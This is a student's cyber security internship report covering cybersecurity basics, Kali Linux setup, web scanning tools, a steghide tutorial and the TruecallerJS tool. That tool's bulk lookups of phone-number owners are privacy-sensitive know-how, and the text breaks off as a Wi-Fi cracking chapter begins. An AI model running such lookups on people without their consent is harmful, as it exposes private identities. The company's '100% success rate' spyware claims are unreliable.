INTERNSHIP REPORT

An internship report submitted in partial fulfilment of the requirements of IV B. Tech I Semester of

BACHELOR OF TECHNOLOGY
In

CSE ( CYBER SECURITY )

by

DURGA SARANYA VANDANALA

20ME1A4657
Under Supervision of

Mr.P.V.Kishore Kumar
Assistant Professor

DEPARTMENT OF CSE(CYBER SECURITY)

DEPARTMENT OF CSE(CYBER SECURITY)

RAMACHANDRA COLLEGE OF ENGINEERING (AUTONOMOUS)
Approved by AICTE, Permanently Affiliated to JNTUK, Recognized by UGC 2(f) & 12(B),

Accredited by NACC A+, Accredited by NBA, , ISO 9001:2015 Certified

NH-16 , BYPASS ROAD , VATLURU(V) , ELURU -534007 , W.G. Dt , A.P

2023-2024

1
 Ramachandra College of Engineering (Autonomous)

Approved by AICTE, Permanently Affiliated to JNTUK, Recognized by UGC 2(f) & 12(B),

Accredited by NAAC A+, Accredited by NBA, ISO 9001:2015 Certified

NH-16, Bypass Road, Vatluru (V), Eluru – 534007, Eluru Dt., A.P.

DEPARTMENT OF CSE(CYBER SECURITY)

CERTIFICATE

This is to certify that the “Internship Report” submitted by DURGA SARANYA

VANDANALA (Regd. No.: 20ME1A4657) is work done by him/her and submitted during
2023 – 2024 academic year in partial fulfillment of the requirements for the award of the
degree of BACHELOR OF TECHNOLOGY in CSE (CYBER SECURITY) , at ST7
SURVEILLANCE SOLUTIONS PVT LTD, Recognized by DPIIT (Department For
Promotion of Industry And Internal Trade).

Mr. P.V.Kishore Kumar Dr. Shameena Begum

Assistant.Professor, Dept. of Cyber Security Head of Cyber Security

External Examiner
 Declaration

we hereby declare that the internship on “cyber security” submitted us to Jawaharlal Nehru
Technological University Kakinada in partial fulfilment of the requirements of IV B.Tech I
semester of bachelor of technology in CSE (CS).this internship work carried by us under the
supervision of Dr. Shameena Begum , Professor in CSE(CS).

Durga Saranya Vandanala

20ME1A4657
 ACKNOWLEDGEMENT

I would like to take the opportunity to express our deep gratitude to all the people who have
extended their cooperation in various ways during my internship. It is my pleasure and
responsibility to acknowledge the help of all those individuals.

I have extended our sincere thanks to Dr.SHAMEENA BEGUM, Professor and Head of the
Department CSE-CYBER SECURITY for helping me in the successful completion of my
internship.

I am very grateful to Mr. P. V. KISHORE KUMAR, Assistant Professor, Department of CSE-

CYBER SECURITY for his assistance and encouragement in all respects in carrying throughout
my internship.

I would like to express my deepest gratitude to Dr. V. Srinivasa Rao, Principal, Ramachandra
College of Engineering, Eluru for his valuable suggestions during the preparation of draft in our
document.

I express my deepest gratitude to The Management of Ramachandra College of Engineering,

Eluru for their support and encouragement in completing my internship and providing me
necessary facilities.

I sincerely thank all the faculty members and staff of the Department of CYBER SECURITY
for their valuable advices, suggestions and constant encouragement which played a vital role in
carrying out my internship.

Finally, I thank one and all who directly or indirectly helped me to complete my internship
successfully.

Durga Saranya Vandanala

20ME1A4657
 ABSTRACT

The internet has considerably enhanced various business critical operations of company’s in
different industry sectors across the globe. However, as more and more organizations become
partially or completely dependent on the internet, computer security and the serious threat of
computer criminals comes to the foreground. The explosive growth of the Internet has brought
many good things: electronic commerce, easy access to vast stores of reference material ,
collaborative computing, e-mail, and new avenues for advertising and information distribution ,to
name a few.

As with most technological advances, there is also a dark side: criminal hackers . Governments,
companies, and private citizens around the world are anxious to be a part of this revolution, but
they are afraid that some hacker will break into their Web server and replace their logo with
pornography, read their e-mail, steal their credit card number from an on-line shopping site, or
implant software that will secretly transmit their organization’s secrets to the open.Internet . With
these concerns and others, the ethical hacker can help.

Unfortunately, most organizations across the globe continue to remain oblivious of the threat .
posed by computer criminals, corporate espionage and cyber terrorism. Ethical Hacking attempts
to pro-actively increase security protection by identifying and patching known security
vulnerabilities on systems owned by other parties.
Organization Information

ST7 Surveillance Solutions is a leading anti-hack company dedicated to providing comprehensive

cybersecurity solutions and protecting businesses from the growing menace of cyber threats.

Programs and Opportunities at the Organization

ST7 Surveillance Solutions Pvt.Ltd is tech based platform and the only private player that gives
live cybercrime solutions .

ST7 surveillance solutions are based on providing the best enhanced services for computers or for
any digital devices and anti-hack services and awareness training on cyber attacks, cyber threats.
ST7 Surveillance Solutions is going to provide online LIVE ethical hacking courses & ST7
Surveillance Solutions is the only company giving cyber crime solutions like (honey-trap, spy-
wares, spoofing attacks, social engineering and many more hackers traps) with 100% success rate.

ST7 Surveillance Solutions is going to provide application security service, data protection service,
networks security service, threat protection service, cyber forensics expert solutions and many
more digital security solution.
 INDEX
S. No Contents Page No

1 Internship Certificate

1 Learning Objectives/Internship Objectives 7

2 Weekly overview of internship activities 8-9

3 Chapter-1 – Cyber Security 10-11
4 Chapter-2 – Ethical Hacking 12-14

5 Chapter-3 – Information System 15-16

6 Chapter-4 - Terms and facts of cybersecurity 17-18

Chapter-5 - Installation of Kali Linux customized by

7 19-21
Z-Security

8 Chapter-6 - Basic Linux Commands 22-23

9 Chapter-7 – Cryptography 24-25

10 Chapter-8 - Data Recovery 26-27

11 Chapter-9 - Photo Forensics 2 8-29

12 Chapter-10 - Website Analysis 30-31

13 Chapter-11 - Penetration Testing 32-33

14 Chapter-12 - Threat scanning in documents 34

15 Chapter-13 - Checking breaches in e-mail address 35

16 Chapter-14 - Stegnography (in built) 36-37

17 Chapter-15 - Malicious software removal 38

18 Chapter-16 - Steganography(using linux command) 39-43

19 Chapter-17 - Truecaller js 44-47

20 Chapter-18 - Wifi Cracking 48

21 Chapter-19 - Phishing 49-54

22 Reflection on the Internship 55

23 Conclusion 56
INTERNSHIP CERTIFICATE
 Learning Objectives/Internship Objectives

● Internships are generally thought of to be reserved for college students looking to gain experience
in a particular field. However, a wide array of people can benefit from Training Internships in order
to receive real world experience and develop their skills.

● An objective for this position should emphasize the skills you already possess in the area and
your interest in learning more.

● Internships are utilized in a number of different career fields, including architecture, engineering,
healthcare, economics, advertising and many more.

● Some internships are used to allow individuals to perform scientific research while others are
specifically designed to allow people to gain first-hand experience working.

● Utilizing internships is a great way to build your resume and develop skills that can be emphasized
in your resume for future jobs. When you are applying for a Training Internship, make sure to
highlight any special skills or talents that can make you stand apart from the rest of the applicants
so that you have an improved chance of landing the position.
 WEEKLY OVERVIEW OF INTERNSHIP ACTIVITIES
Week Date Day Name of topic / Module completed
26-5-2023 Friday Module1 – Introduction to Cybersecurity

27-5-2023 Saturday Module1 – Introduction to Ethical Hacking

28-5-2023 Sunday Module1 – Introduction to Ethical Hacking

I 29-5-2023 Monday Module1 – Information System

30-5-2023 Tuesday Module1 – Terms and Facts in cybersecurity

31-5-2023 Wednesday Module1 – Installation of Kali Linux by Z-Security

1-6-2023 Thursday Module1 – Installation of Kali Linux by Z-Security

Week Date Day Name of topic / Module completed

2-6-2023 Friday Module2 – Learn linux basics

Module2 – Learn Linux commands & how to interact

3-6-2023 Saturday
with the terminal

4-6-2023 Sunday Module2 – Introduction to Cryptography

II
5-6-2023 Monday Module2 – Cryptography inbuilt tool

6-6-2023 Tuesday Module2 – data recovery inbuilt tool

7-6-2023 Wednesday Module2 – Introduction to Photo Forensics

8-6-2023 Thursday Module2 – Photo Forensics inbuilt tool

Week Date Day Name of topic / Module completed

9-6-2023 Friday Module3 – Introduction to Website Analysis
10-6-2023 Saturday Module3 – Website Analysis inbuilt tool

11-6-2023 Sunday Module3 – About Penetration testing

12-6-2023 Monday Module3 – Introduction to Penetration testing

III
13-6-2023 Tuesday Module3 – Penetration testing inbuilt tool

14-6-2023 Wednesday Module3 – About malware in documents

15-6-2023 Thursday Module3 – Scanning of malware in documents using inbuilt tool

Week Date Day Name of topic / Module completed
16-6-2023 Friday Module3 – Practice Exercise 1

17-6-2023 Saturday Module3 – About Email

18-6-2023 Sunday Module3 – Checking breaches in emails using inbuilt tool

IV 19-6-2023 Monday Module3 – About Steganography

20-6-2023 Tuesday Module3 – Stegnography using inbuilt tool

21-6-2023 Wednesday Module4 – About various malicious software

22-6-2023 Thursday Module4 – Malicious software removal from system

Week Date Day Name of topic / Module completed

23-6-2023 Friday Module4 – Practice Exercise 2

24-6-2023 Saturday Module4 – Stegnography using linux commands

25-6-2023 Sunday Module4 – Stegnography using linux commands

V 26-6-2023 Monday Module4 – Stegnography using linux commands

27-6-2023 Tuesday Module4 – About Truecaller JS

28-6-2023 Wednesday Module4 – Truecaller JS using linux commands

29-6-2023 Thursday Module4 – Truecaller JS using linux commands

Week Date Day Name of topic / Module completed

30-6-2023 Friday Module5 – Practice Exercise 3

1-7-2023 Saturday Module5 – Wifi Cracking using linux commands

2-7-2023 Sunday Module5 – Wifi Cracking using linux commands

VI 3-7-2023 Monday Module5 – Wifi Cracking using linux commands

4-7-2023 Tuesday Module5 – Practice Exercise 4

5-7-2023 Wednesday Module5 – Introduction to phishing

6-7-2023 Thursday Module5 – Types of phishing attacks

Week Date Day Name of topic / Module completed
7-7-2023 Friday Module5 – Installation of maxphisher

8-7-2023 Saturday Module5 – Practicing phishing attacks by maxphisher

VII
9-7-2023 Sunday Module5 – Conclusion on internship

10-7-2023 Monday Module5 – Grand Test

 CHAPTER-1

CYBER SECURITY
INTRODUCTION

→Cyber Security is a combination of 2 words

→Cyber refers to the things which are related to internet.

→Security refers to protection for systems.

1.The method of securing internet connecting system against threat is called as cyber security .

2.Cyber security is also called as information technology system security and electronic
information security.

TYPES OF CYBER SECURITY

There are five types of Cyber Security.

i) Network Security
ii) Application Security iii) Data Security
iv) Mobile Security
v) Cloud Security

Network Security
Securing computers that are connected to a single network.Network security is any activity
designed to protect the usability and integrity of your network and data. It includes both hardware
and software.

Application Security
Giving Security to apps is called Application Security.Application security describes security
measures at the application level that aim to prevent data or code within the app from being stolen
or hijacked.

Data Security
Data security is the process of safeguarding digital information throughout its entire life cycle to
protect it from corruption,theft, or unauthorized access.
Mobile Security:
To protect data from email-based cyber threats such as malware, identity theft and phishing
scams,organizations need to monitor email traffic proactively.

Cloud Security:
It is a collection of procedures and technology designed to address external and internal threats to
business security. Cloud security refers to the technologies, policies, controls, and services that
protect cloud data, applications, and infrastructure from threats.
Cloud Security, also known as cloud computing security, is a collection of security measures
designed to protect cloud-based infrastructure, applications
 Chapter-2
Ethical Hacking
Introduction
Cybersecurity is the practice of protecting computer systems, networks, and data from unauthorized
access, attacks, damage, or theft. It encompasses various technologies, processes, and practices
designed to safeguard information and systems from cyber threats.
Here's an introductory breakdown of cybersecurity:

Protective Measures: Cybersecurity involves implementing measures to prevent unauthorized

access to systems and data. This includes using firewalls, encryption, multi-factor authentication,
and intrusion detection systems to create barriers against potential threats.

Threat Detection and Response: It's essential to continuously monitor systems for any
suspicious activities or potential security breaches. Cybersecurity professionals employ tools and
technologies to detect, analyze, and respond to security incidents promptly.

Risk Management: Assessing and managing risks is a crucial aspect of cybersecurity. This
involves identifying vulnerabilities, evaluating their potential impact, and prioritizing measures to
mitigate these risks effectively.

Education and Training: Human error is often a significant factor in cyber breaches.
Therefore, educating users about security best practices, providing training on how to recognize
phishing attempts, and promoting a securityconscious culture within organizations are essential
elements of cybersecurity.

Compliance and Regulation: Many industries have specific regulations and compliance
standards related to cybersecurity (such as GDPR, HIPAA, etc.). Adhering to these standards is
crucial to ensure the protection of sensitive information and avoid legal consequences.

Emerging Technologies: As technology evolves, so do cyber threats. Cybersecurity

continually adapts to new technologies like AI, IoT, cloud computing, and mobile devices, ensuring
that security measures keep pace with these advancements.
Cybersecurity professionals work in various roles, including cybersecurity analysts, ethical
hackers, security architects, incident responders, and more. They continuously monitor, analyze,
and enhance security measures to protect against a broad spectrum of cyber threats, ranging from
viruses and malware to sophisticated cyber-attacks As the digital landscape expands, the
importance of cybersecurity grows, making it a critical field in safeguarding sensitive information
and ensuring the smooth functioning of businesses, governments, and individuals in the digital age.
Ethical hacking plays a pivotal role in strengthening cybersecurity by proactively identifying
vulnerabilities.

Ethical hackers use their expertise to simulate real-world attacks, exposing weaknesses in systems
and networks. By discovering these flaws before malicious actors exploit them, ethical hacking
contributes to fortifying defenses. This collaboration ensures proactive measures patching
vulnerabilities and implementing robust security protocols ultimately bolstering cybersecurity
posture. Ethical hacking serves as a proactive defense mechanism, enhancing the resilience of
cybersecurity measures against evolving threats and potential breaches.Ethical hacking operates
within a legal framework governed by cyber laws, ensuring that hacking activities are conducted
responsibly, lawfully, and with explicit permission. These laws vary across countries but generally
encompass:

→Authorization: Ethical hacking mandates explicit permission from system owners or

authorized personnel before conducting any testing or vulnerability assessments.

→Scope Limitations: It defines the boundaries within which ethical hackers can operate,
specifying the systems, networks, or applications that can be tested and the methods allowed.

→Data Protection: Cyber laws enforce strict regulations regarding the handling and protection
of sensitive data.

Ethical hackers must adhere to privacy laws and avoid accessing, tampering, or exposing private
information during their assessments.

→Reporting and Compliance: Ethical hackers are typically required to document their
findings accurately, report vulnerabilities to the system owners, and comply with any post-
assessment protocols or actions.

→Liabilities and Responsibilities: Cyber laws outline liabilities and responsibilities for both
the ethical hacker and the system owner, ensuring accountability and mitigating risks associated
with hacking activities.

Understanding and adhering to these cyber laws is crucial for ethical hackers to conduct their
assessments legally and responsibly. Compliance with these laws ensures that ethical hacking
activities contribute positively to enhancing cybersecurity without infringing on legal boundaries
or causing unintended harm.
Cybersecurity laws and regulations aim to establish legal frameworks that govern the
protection of digital systems, data, and networks. These laws vary globally and cover
several aspects:

1.Data Protection and Privacy Laws: Regulations like GDPR (General Data Protection
Regulation) in the EU or CCPA (California Consumer Privacy Act) in the United States mandate
how personal data is collected, processed, and stored. They also outline individuals' rights
regarding their data.

2.Cybercrime Laws: These laws address various cyber offenses, such as hacking, identity
theft, malware distribution, and cyber fraud. They outline penalties for illegal activities and
unauthorized access to computer systems.

3.Sector-Specific Regulations: Industries like finance, healthcare, and government have

specific cybersecurity regulations to protect sensitive information. For instance, HIPAA (Health
Insurance Portability and Accountability Act) in healthcare or PCI DSS (Payment Card Industry
Data Security Standard) in the finance sector.

4.National Security Laws: Some laws focus on protecting a country's critical infrastructure
from cyber threats. They often involve regulations related to national security, espionage, and
protecting government systems.

5.Incident Notification Laws: These laws mandate that organizations report data breaches
or cyber incidents within a specified timeframe. They aim to improve transparency and allow for a
timely response to mitigate damages.
 CHAPTER-3
INFORMATION SYSTEM

Data is the raw material that can be processed by any computer system.

Information:

Information refers to the data that should be processed in such a way that it should be meaningful
to the people who receive it.

Information system

It is a collection of multiple information resources together.An information system can be defined

as a set of interrelated components that collect, manipulate, store data, distribute information to
support decision making and provide a feedback mechanism to monitor performance. It may also
help the manager and workers to analyze problems, visualize complex subject, and create new
products. Software, Hardware, information system users, computer system connections and
information, and the system's housing are all part of an Information System.

Components of Information System

The components that must be combined together in order to produce an information system are:

People: Peoples are the most essential part of the information system because without
them the system cannot be operated correctly.

Hardware: It is the part of a physical component of an information system which we

can touch. The information system hardware includes the computer, processors, monitors,
printer, keyboards, disk drives, iPads, flash drives, etc.

Software: It is a set of instruction that tells the hardware what to do. It can be used to
organize, process and analyze data in the information system.

Data: Data is a collection of facts. Information systems work with data. These data can
be aggregated, indexed, and organized into tables and files together to form a database.
These databases can become a powerful tool for every businesses information system.
 Network: It includes internet, intranet, extranet to provide successful operations for all
types of organizations and computer-based information system

Procedures: It specifies the policies that govern the operation of an information system.
It describes how specific method of data are processed and analyzed to get the answers for
which the information system is designed

Feedback: It is the component of an information system which defines that an IS may

be provided with feedback.

DIMENSIONS OF INFORMATION SYSTEM

There are three dimensions of Information System:

1)Organization Dimension

2)Management Dimension

3)Technological Dimension

Organization Dimension:

The Organizational Dimensions of Information includes information flows, information

granularity, and what information describes. order processing, developing and producing goods
and services, and serving customers

Management Dimension:
The management dimension of information systems involves leadership, strategy, and management
behavior. Information systems supply tools and information needed by managers to allocate,
coordinate and monitor their work, make decisions, create new products, and services and make
long-range strategic decisions.

Technological Dimension:
The technology dimension includes everything that is related to technology resources and that are
required for the growth of a company. These may include computer software, hardware, different
applications, the internet, and so on and so forth.
 CHAPTER-4

TERMS AND FACTS OF CYBERSECURITY

Steps To Solve The Risk:

There are five steps :

1.Identify the risk

2.Analyze the risk

3.Evaluate the risk

4.Treat the risk

5.Review

Terms Used in Cyber Security:

Vulnerability

Malware

Ransomware

Steganography

Cryptography

Penetration Testing
Vulnerability:

Weakness of a system or software is known as Vulnerability.

Malware:
It is a malicious software ,which is delivered over a network that steals sensitive
data like personal information and infects the whole system.

Ransomware:
Ransomware is a type of malware that prevents you from accessing your computer
(or the data t that is stored on it. The computer itself may become locked, or the data
on it might be stolen, deleted or encrypted.

Steganography:
Steganography is the practice of concealing information within another message or
physical object to avoid detection. Steganography can be used to hide virtually any
type of digital content, including text, image, video, or audio content. That hidden
data is then extracted at its destination.

Cryptography:
Cryptography is the process of hiding or coding information so that only the person
a message was intended for can read it. The art of cryptography has been used to
code messages for thousands of years and continues to be used in bank cards,
computer passwords, and ecommerce.

Penetration Testing:
Penetration testing (or pen testing) is a security exercise where a cyber-security
expert attempts to find and exploit vulnerabilities in a computer system. The purpose
of this simulated attack is to identify any weak spots in a system's defenses which
attackers could take advantage of.
Facts of Cyber Attacks

1. 75% of cyber attacks start with a email.

2. The global average cost of data breach is around 3.9 million dollars.

3. For every 39 seconds there will be a cyber attack.

4. Because of human errors 95% of data breaches are been occurred.

5. Most of the companies takes nearly 6 months to detect the data breach even
if it is a major one also.
6. Since Covi 19 there is an increase of 300% of cyber crimes because of
increase in Staff working from home.
7. 21% files are not at protected.

8. 4 Million of files are stolen everyday

 CHAPTER-5
Installation of Kali Linux customized by Z-Security
Requirements:
VMware Workstation or VMware Player (for virtualization) WinRAR (for extracting the
compressed file)

Download and Extract the Customized Kali Linux:

step-1:Download the Customized Kali Linux: Visit the Z-Security website or the platform
where they host the customized Kali Linux distribution. Once you've found the download link,
download the file to your local system.
It will typically be in the form of an ISO image.

step-2:Extract the ISO file using WinRAR: Right-click on the downloaded file, select "Extract
Here" or open it with WinRAR. This will extract the contents of the ISO file to a folder on your
computer.

Fig1:Extract the ISO file using WinRAR

Install Kali Linux on VMware:

step-3:Install VMware: If you haven't already, download and install VMware Workstation or
VMware Player, depending on your preference. You can get the installer from the VMware
website.

step-4:Create a New Virtual Machine:

→Open VMware and select "Create a New Virtual Machine."
→Choose "Typical" or "Custom" installation, depending on your familiarity and preferences.
→Select the extracted Kali Linux files as the installation media.
step-5:Configure Virtual Machine Settings:
Set the amount of RAM and number of processor cores you want to allocate to the virtual
machine. Recommended minimum for Kali Linux is 2GB RAM and 2 CPU cores, but more
would be better if your system allows. Create a virtual hard disk or use an existing one for the
installation.
 Fig2:Configure Virtual Machine Settings
step-6:Install Kali Linux:
Start the virtual machine and follow the on-screen instructions to install Kali Linux.

During the installation process, you'll be prompted to set up various settings such as language,
location, keyboard layout, and user account details.

Complete Installation: Once the installation is complete, restart the virtual machine.

fig3:Install KaliLinux
Post-Installation:
step-4:Customize as Needed: Since this is a customized version by Z-Security, it might include
specific tools or configurations. Explore the system to see what modifications have been made and
how they differ from the standard Kali Linux distribution.

step-7:Update and Upgrade: Open a terminal and run the following commands to update and
upgrade sudo apt update sudo apt upgrade

step-8:Explore and Use: Familiarize yourself with the customized features and tools that Z-
Security has integrated into this Kali Linux build.

fig4: After installation

 CHAPTER-6
Basic Linux Commands
File System Commands:
→ls: List directory contents. ls: List files and directories in the current directory. ls -l: Detailed
list with permissions, owner, size, etc. ls -a: Show hidden files as well.
→cd: Change directory. cd directory_name: Move into a specific directory.
cd ..: Move up one directory level. cd ~ or cd: Go to the home directory.
→pwd: Print working directory.
Displays the path of the current directory. mkdir:Make directory.
→mkdir directory_name: Create a new directory.
rm: Remove files or directories.
→rm file_name: Remove a file.
rm -r directory_name: Remove a directory and its contents.
→cp: Copy files or directories. cp file_name destination: Copy a file. cp -r directory_name
destination: Copy a directory and its contents.
→mv: Move or rename files or directories. mv old_name new_name: Rename a file.
mv file_name destination: Move a file or directory. →System Information:
uname: Print system information.
uname -a: Display all system information.
whoami: Display the currently logged-in user.
→hostname: Show the system's hostname.
→File Manipulation: cat: Concatenate and display files. cat file_name: Display the contents of a
file.
head and tail: Display the beginning or end of a file. head file_name: Display the first part of a
file. tail file_name: Display the last part of a file
→Networking: ifconfig or ip: Display network configuration information. ping: Check
connectivity to a remote host. ping domain_or_ip: Send ICMP echo requests. netstat: Display
network statistics. netstat -tuln: List all listening ports.
traceroute: Show the route packets take to reach a destination.
→Package Management: apt: Package management utility. apt update: Update package lists. apt
upgrade: Upgrade installed packages. apt install package_name: Install a package. apt remove
package_name: Remove a package.
→Users and Permissions: sudo: Execute a command with superuser privileges. chmod: Change
file permissions.
 CHAPTER -7
CRYPTOGRAPHY
To communicate secretly between two persons over an internet without the involvement of third
party.This process of encryption and decryption is called as cryptography.

Cryptography is technique of securing information and communications through use of codes so

that only those person for whom the information is intended can understand it and process it. Thus
preventing unauthorized access to information. The prefix “crypt” means “hidden” and suffix
“graphy” means “writing”. In Cryptography the techniques which are use to protect information
are obtained from mathematical concepts and a set of rule based calculations known as algorithms
to convert messages in ways that make it hard to decode it. These algorithms are used for
cryptographic key generation, digital signing, verification to protect data privacy, web browsing
on internet and to protect confidential transactions such as credit card and debit card transactions.
Tool we used for cryptograpy is “encrypt-online”.
https://encrypt-online.com/decrypt
Step-1 :Encryption

Step-2: passphrase for the text to decrypt click encrypt

Step-3:Copy the encrypted text.go to “Decrypt”.
Step-4:Paste the encrypted text and passphrase Step-6:now click decrypt
 CHAPTER-8

DATA RECOVERY
We use “Disk drill application” to recover files. Installation of disk drill
https://www.cleverfiles.com/data-recovery-software.h

Fig1:Go to the website

Step-2:Open the disk drill downloaded folder Step-3 :Click “Yes” & click
on “install”
Data Recovery:
Step-4:Open Disk drill & click “yes” Step-5:Click “Search for Lost data”

STEP-6:CHECK FOR THE RECOVERED DATA

 CHAPTER-9

PHOTO FORENSICS
FotoForensics provides budding researchers and professional investigators access to cutting- edge
tools for digital photo forensics. FotoForensics is designed and organized for rapid analysis. With
a little experience, an analyst should be able to evaluate a picture in minutes.

Step1:Click on ” https://fotoforensics.com/” Step-2:Upload the url of a picture

FIG1:OPEN WEBSITE FIG2:UPLOAD FILE

FIG3:VERIFYING ICC+ FIG4:ANALYSIS

 CHAPTER-10
WEBSITE ANALYSIS:
We use “sucuri “ tool for site checking .

Step-1: Open https://sitecheck.sucuri.net

FIG1:OPEN SITECHECK SUCURI WEBSITE AND ENTER THE URL

Step-2:Upload a url.

FIG2:ANALYSING RISK TYPE FIG3:WEBSITE ANALYSIS

 CHAPTER-11
PENETRATION TESTING
Penetration testing (or pen testing) is a simulation of a cyberattack that tests a computer system,
network, or application for security weaknesses.
We use a website “ https://pentest-tools.com/ ”

FIG1:PENTEST-TOOLS WEBSITE
LOGIN WITH YOUR GOOGLE ACCOUNT

Fig2: Loging to pentest tools website Fig3:Scanning the website

 Fig4: Giving the target to scan vulnerability

UPLOAD THE TARGET URL

Fig5:Scanning of a target website Fig6:website vulnerability scanner result

 CHAPTER-12
THREAT SCANNING IN DOCUMENTS
We use “Filescan.io” website to scan threats among the files or documents.

https://www.filescan.io/scan

It uses adaptive threat analysis technology to detect evasive malware and extract relevant Indicators
of Compromise (IOCs).

FIG1:UPLOADING THE FILE FOR

FIG2:THREAT ANALYSIS FIG3:ANALYSIS OVERVIEW

 CHAPTER-13

CHECKING BREACHES IN E-MAIL ADDRESS

We use “haveibeenpwned” website. https://haveibeenpwned.com/

Checking breaches in -Email:

FIG1:CHECKING BREACHES IN-MAIL

E

CHECKING OF PASSWORDS

FIG2:CHECKING BREACHES IN PASSWORD

 CHAPTER-14

STEGNOGRAPHY (IN BUILT)

Steganography is the practice of representing information within another message or physical

object, in such a manner that the presence of the information is not evident to human inspection.
In computing/electronic contexts, a computer file, message, image, or video is concealed within
another file.

We use “ https://www.mobilefish.com/services/steganography/steganography.php ”

Step-1:Open the url upload the cover file and image file Step-2:Enter passphrase and code

FIG1:UPLOADING COVER FILE AND IMAGE FILE FIG2:ENTERING PASSPHRASE AND CODE

Step-3:Download the encrypted file.

Step-4: choose the encrypted file to decrypt and then enter passphrase

Step-5: Download the decrypted file.

 CHAPTER-15
MALICIOUS SOFTWARE REMOVAL
We use “mrt” tool in the run app to remove the malicious software in the system

FIG1:OPENING “mrt” TOOL IN “RUN”

FIG2:SELECT TH SCAN TYPE

FIG3:SCAN RESULTS
 CHAPTER-16
STEGANOGRAPHY(USING LINUX COMMAND)
Hiding data within an image sounds like something out of a spy movie. You don’t have to be a
modern James Bond to learn this skill known as steganography.
Steganography is used in many capture the flag challenges in cybersecurity and hacking events.

In this article, we will discuss how to use Steghide on Kali Linux to conceal and extract hidden
data within an image.

Prerequisites

● Kali Linux

● JPEG or BMP Image

● Text File

● Internet Connection

1. Install Steghide

You’ll first need to install Steghide. To see if you have Steghide installed you can run the following
command.
mrkmety@kali:~$ which steghide mrkmety@kali:~$
If nothing is returned you will need to run the following command to install Steghide.

mrkmety@kali:~$ sudo apt install steghide -y

Reading Package Lists... Done

Setting up steghide (0.5.1-14)...

Processing triggers for libc-bin (2.30-4)...

Processing triggers for man-db (2.9.1-1)... Processing triggers for kali-menu (2020.2.1)...
mrkmety@kali:~$

Steghide should now be installed. Run the following command to verify.

mrkmety@kali:~$ which steghide mrkmety@kali:~$ /usr/bin/steghide
Step 2. Read the Steghide man page and help section

You should familiarize yourself with the man page and help section that is available after installing
Steghide. While we will cover the required commands and flags to accomplish basic embedding
and extraction of data from an image, it’s best to have a grasp on what a program does and the
available flags/options.
Run the following command to pull up the man page.

mrkmety@kali:~$ man steghide

Press Q to exit the man page once you have a basic understand of the program and features.

Run the following command to pull up the Steghide help section.

mrkmety@kali:~$ steghide --help

Move on to the next step once you are familiar with how the program works.

3. Find an Image
You are now ready to find an image in which you will embed data.
Steghide supports JPEG and BMP image file types. Once you have an image, ensure it is available
on your Kali machine.
In this example, we will use the first JPEG image located in this article. Feel free to grab that image
or any other JPEG or BMP file.
The filename in this example will be named “regular_image.jpeg”.
4. Have Your Secret Text Ready

fig1:Classified information
Steghide does not have restrictions on the type of format secret data. You can embed anything
you’d like in the image.
We are going to create a text file called “super_secret_stuff.txt” that we will use to embed in the
image. You can use any text editor you’d like or you can run the following command to quickly
create a text file.

mrkmety@kali:~$ echo "This is super secret text!" > ./super_secret_stuff.txt

You can check to see if the text file has been created and the contents by running the following
command.

mrkmety@kali:~$ cat super_secret_stuff.txt This is super secret text!

Now that you have your image and text we are ready to move on to embedding the text in the
image.
5. Embedding Data
You are now ready to start embedding data into your image using Steghide.
Run the following command to embed “super_secret_stuff.txt” into the image named
“regular_image.jpeg”
mrkmety@kali:~$ steghide embed -cf regular_image.jpeg -ef super_secret_stuff.txt
Let’s break down what this command is doing.
steghide — The name of the program embed — This is the command
-cf — This flag is for the cover file (file used to embed data) filename — This is the name of
the cover file
-ef — This flag is for the embed file (file that will be embedded) filename — This is the
name of the embedded file
You will be prompted to enter a passphrase. This passphrase will be required for anyone trying to
extract the data from the image.
Enter a passphrase of “secrettext”. Re-Enter your passphrase.
Enter passphrase:
Re-Enter passphrase:
embedding "super_secret_stuff.txt" in "regular_image.jpeg"... done Congrats! Your text file
is now embedded in the image!
Let’s move on to how we can extract the text file from the image.
6. Extract Data From Image
Extracting the data from the image is fairly easy as long as you know the passphrase.Run the
following command to extract the “super_secret_stuff.txt” file from the “regular_image.jpeg” file.
mrkmety@kali:~$ steghide extract -sf regular_image.jpeg
You will be prompted to enter the passphrase.
Enter passphrase: wrote extracted data to "super_secret_stuff.txt".
The embedded text file will be extracted and written to your current directory.
Congrats! You successfully extracted a hidden text file from an image!

fig2:Extracting the hidden text

 CHAPTER-17
TRUECALLER JS

This is a library for retrieving phone number details using the Truecaller API. It provides a simple
and convenient way to access information about phone numbers in your Node.

Description

TruecallerJS is built to simplify the process of fetching phone number details. With this library,
you can easily integrate Truecaller functionality into your Node.js, JavaScript, and TypeScript
applications. It abstracts the complexities of interacting with the Truecaller API and provides a
streamlined interface for fetching and processing phone number information.

Features
● Phone Number Lookup: Retrieve detailed information about a phone number, including the
owner's name, location, and more.
● Support for Node.js, JavaScript, and TypeScript: TruecallerJS can be used in Node.js projects, as
well as in JavaScript and TypeScript applications.
● Simple and Lightweight: TruecallerJS is designed to be easy to use and lightweight.

Installation
You can install TruecallerJS using npm:

npm install truecallerjs

To use TruecallerJS from the command line

npm install -g truecallerjs

Command Line Usage
To use TruecallerJS from the command line, you can run the truecallerjs command followed by
the desired options and arguments.
Here are some examples of the available options:

● truecallerjs login:Use this command to log in to your Truecaller account.

● truecallerjs -s [number]: Use this command to search for a phone number and retrieve the caller
name and related information.

● truecallerjs --bulksearch, --bscommand is used to performing bulk number searches using the
Truecaller service. It allows you to search for multiple phone numbers at once, making it
convenient for processing large sets of phone numbers in a single request
● truecallerjs --bulksearch, --bs: Use this command to perform a bulk number search.

● Additional options include --raw, --name, --email, --json, --xml, --yaml, --text, --nc, --
installationid, -verbose, and --help.

fig1: Details of an unknown person

For example:
~$ truecallerjs -s +9199123456789 --json
{
...
"name":"Sumith Emmadi"
...
}
~$ truecallerjs -s +9199123456789 --name Name : Sumith Emmadi
Example for bulk search
truecallerjs --bulksearch
<phone_number_1>,<phone_number_2>,<phone_number_3>,...,<phone_number_n>
Replace <phone_number_1>, <phone_number_2>, ..., <phone_number_n> with the actual phone
numbers you want to search. Separate each phone number with a comma.
~$ truecallerjs --bs 9912345678,+14051234567,+919987654321
 CHAPTER-18

Wifi Cracking

Aircrack-ng is a package of Wi-Fi network security assessment tools. It has a detector, a packet
sniffer, WPA/WPA2PSK, and a WEP cracker and analyzer for 802.11 Wireless LANs.

With the help of Aircrack-ng, a penetration tester can focus on Monitoring, Attacking, Testing, and
